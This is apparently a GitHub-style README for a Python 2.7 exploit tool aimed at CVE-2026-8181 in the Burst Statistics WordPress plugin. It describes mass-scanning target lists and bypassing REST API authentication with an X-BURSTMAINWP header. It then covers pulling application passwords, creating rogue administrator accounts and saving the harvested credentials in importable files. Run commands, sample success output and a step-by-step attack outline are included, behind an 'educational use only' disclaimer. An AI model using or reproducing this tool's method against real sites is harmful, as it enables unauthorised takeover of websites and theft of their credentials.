
CVE-2026-8181: Burst Statistics Auth Bypass → REST API takeover & admin creation. Python 2.7. Educational use only.
Python 2.7 exploit for the Burst Statistics plugin vulnerability (CVE-2026-8181) that allows unauthenticated attackers to bypass REST API authentication, retrieve application passwords, and create new administrator users on vulnerable WordPress sites.
⚠️ Disclaimer
This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use only on websites you own or have explicit permission to test. More Disclaimer You can see the disclaimer on the cover of Jenderal92. You can check it HERE !!!
CVE-2026-8181 affects the Burst Statistics plugin for WordPress (versions prior to the patch). The flaw resides in the REST API authentication mechanism, allowing an attacker to:
X-BURSTMAINWP header/burst/v1/mainwp-auth endpoint/, /wordpress, /wp)/wp-json/wp/v2/users or author ID redirectsres_login.txt – Concise, pipe‑separated REST API credentials (easy to parse/import)full_res_login.txt – Complete human‑readable report including access verification and application passwordsrequests librarypip install requests
Prepare a target list file (one domain or IP per line, with or without http:///https://).
Example targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Run the exploit:
python2 CVE-2026-8181.py targets.txt
res_login.txt – REST API credentials (one line per vulnerable target)full_res_login.txt – Detailed report| Argument | Description |
|---|---|
list.txt | Path to file containing target URLs |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – Concise REST API CredentialsEach line follows this pipe‑separated format:
target|username|password|email|user_id
Example:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
This format is ideal for:
cut, grep, or Excelfull_res_login.txt – Complete Detailed ReportFor each vulnerable target, the script appends a human‑readable block:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
Note: If the application password endpoint is not available or returns no token, that section will show
FAILED.
http:// prefix if missing, strips trailing slashes./, /wordpress, and /wp as WordPress base directories./wp-json/wp/v2/users or uses ?author=N redirects.X-BURSTMAINWP: 1 + Basic auth with username and dummy password (CVE-2026-8181). If endpoint /wp-json/wp/v2/users/me?context=edit returns 200, the site is vulnerable./wp-json/burst/v1/mainwp-auth to retrieve an application password token./settings, /plugins, /users.POST /wp-json/wp/v2/users.res_login.txt and full details to full_res_login.txt.You can modify these variables inside the script:
THREADS – Number of concurrent threads (default 10)BASE_PATHS – Additional WordPress subdirectories to checkrequests timeout valuesThis project is provided for educational purposes only. Use at your own risk.